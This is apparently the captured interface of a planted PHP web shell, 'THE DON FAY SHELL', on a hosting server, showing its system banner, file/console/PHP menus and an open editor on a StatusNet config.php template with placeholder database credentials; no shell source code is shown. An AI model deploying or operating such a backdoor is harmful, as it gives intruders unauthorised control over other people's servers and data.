đĨ THE DON FAY SHELL đĨ
Linux web.getstreamhosting.com 4.18.0-553.123.2.el8_10.x86_64 #1 SMP Thu May 7 15:28:41 EDT 2026 x86_64 | PHP: 8.4.22 | IP: 216.73.216.6
đ FILES
đģ CONSOLE
đ PHP
âšī¸ INFO
âī¸ Editing: config.php
<?php if (!defined('STATUSNET') && !defined('LACONICA')) { exit(1); } $config['site']['name'] = '[[site_name]]'; $config['site']['server'] = '[[domhost]]'; $config['site']['path'] = '[[relativeurl_]]'; $config['db']['database'] = 'mysqli://[[softdbuser]]:[[softdbpass]]@[[softdbhost]]/[[softdb]]'; $config['db']['type'] = 'mysql'; $config['site']['profile'] = '[[site_profile]]'; [[fancy]] [[singleuser]]
đ Cancel